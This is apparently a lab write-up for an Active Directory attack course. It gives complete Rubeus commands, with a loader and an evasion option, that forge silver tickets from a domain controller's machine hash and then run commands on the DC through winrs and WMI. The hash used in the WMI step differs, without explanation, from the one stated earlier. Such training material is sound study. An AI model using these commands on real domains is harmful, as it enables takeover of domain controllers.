Tasks
1 - Try to get command execution on the domain controller by creating silver ticket for:
Flag 18 [dcorp-dc] - The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩
Solutions
1 - Try to get command execution on the domain controller by creating silver ticket for:
Based on the last task we already have the hash for the machine account of the domain controller (dcorp-dc$).
RID : 000003e8 (1000)
User : DCORP-DC$
LM :
NTLM : e4ce16e20da2e11d2901e0fb8a4f28b0
HTTP
We can create a Silver Ticket that provides us access to the HTTP service (WinRM) on DC:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:e4ce16e20da2e11d2901e0fb8a4f28b0 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
We can check if we got the correct service ticket:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist
And run klist
or C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist
we can see it
http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
let's try accessing it using winrs. Note that we are using FQDN of dcorp-dc as that is what the service ticket has:
winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
set username
set computername
WMI
For accessing WMI, we need to create two tickets: one for HOST service and another for RPCSS.
We can start to run the following commands from an elevated shell:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:c6a60b67476b36ad7838d7875c33c2c3 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:c6a60b67476b36ad7838d7875c33c2c3 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
Verify that tickets generated are present:
let's try to use WMI commands on the domain controller:
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
Flag 18 [dcorp-dc] - The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩
As we can see in the previous task the XXXX service can be used for winrs or PowerShell Remoting.